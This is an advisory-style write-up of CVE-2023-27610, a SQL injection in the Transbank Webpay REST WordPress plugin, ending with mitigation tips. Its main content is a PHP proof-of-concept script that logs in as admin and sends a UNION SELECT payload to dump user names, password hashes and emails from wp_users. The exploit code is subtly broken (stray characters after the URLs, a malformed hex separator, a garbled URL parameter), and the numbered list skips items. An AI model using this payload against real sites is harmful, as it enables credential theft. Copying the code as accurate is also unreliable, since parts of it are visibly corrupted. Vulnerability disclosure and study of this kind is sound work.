In this article, we will discuss a critical vulnerability that affects the TransbankDevelopers Transbank Webpay REST plugin <= 1.6.6 versions, allowing an attacker with admin privileges to exploit a SQL Injection (SQLi) vulnerability. This vulnerability has been assigned the CVE-2023-27610 identification number, and by exploiting it, an attacker could potentially execute arbitrary SQL commands against the application's database, leading to unauthorized disclosure of sensitive information, tampering with data, or even complete control over the affected system.
Vulnerability Details
The vulnerability resides within the inc/webpay-rest.php file, specifically in the handling of the $_POST['order_id'] parameter. The lack of proper input validation and sanitation for this parameter makes it susceptible to SQLi attacks.
Proof of Concept (PoC) Code Snippet
The following code snippet demonstrates how an authenticated admin user could potentially exploit this vulnerability:
<?php
// Authenticating with admin privileges
$ch = curl_init();
$admin_username = 'admin';
$admin_password = 'P@$$wrd';
curl_setopt($ch, CURLOPT_URL, "http://example.com/wp-login.php";);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "log=$admin_username&pwd=$admin_password");
curl_setopt($ch, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);
// Send SQL command via the vulnerable parameter
$sql_command = "' UNION SELECT 1,2,3,4,group_concat(user_login,x3a,user_pass,x3a,user_email) FROM wp_users--";
curl_setopt($ch, CURLOPT_URL, "http://example.com/wp-admin/admin.php?page=wc-settings&tab=checkout§ion=webpay";);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "order_id=".$sql_command);
curl_setopt($ch, CURLOPT_COOKIEFILE, "cookie.txt");
$response = curl_exec($ch);
// Display the result.
echo $response;
curl_close($ch);
?>
By executing this script, an attacker could potentially retrieve sensitive information, such as user login information and email addresses, directly from the wp_users table.
Original References
1. The TransbankDevelopers GitHub repository, which contains the vulnerable code, can be found here: https://github.com/TransbankDevelopers/transbank-webpay-rest/tree/v1.6.6
2. The specific vulnerable file inc/webpay-rest.php is available at: https://github.com/TransbankDevelopers/transbank-webpay-rest/blob/v1.6.6/inc/webpay-rest.php
3. The official WordPress plugin page for Transbank Webpay REST plugin is located at: https://wordpress.org/plugins/transbank-webpay-rest/
Mitigation and Recommendations
If you are running version 1.6.6 or earlier of the Transbank Webpay REST plugin, it is highly recommended that you update to the latest version to patch this vulnerability. In addition to updating the software, it is essential to follow best practices, such as:
Limit the privileges of database accounts used by the application to only what is necessary.
3. Regularly monitor and update all software, plugins, and themes on your WordPress installation to protect against newly discovered vulnerabilities.
4. Utilize Web Application Firewalls and Intrusion Detection/Prevention Systems to help protect against attacks.
Conclusion
The CVE-2023-27610 SQL Injection vulnerability present in TransbankDevelopers Transbank Webpay REST plugin <= 1.6.6 versions poses a significant risk to affected websites. By exploiting this vulnerability, an attacker with admin privileges can execute arbitrary SQL commands against the application's database, potentially leading to unauthorized disclosure of sensitive information or complete control of the affected system. It is crucial for users of this plugin to update their installations and implement best practices to mitigate this risk.
Timeline
Published on: 04/16/2023 08:15:00 UTC
Last modified on: 04/25/2023 19:50:00 UTC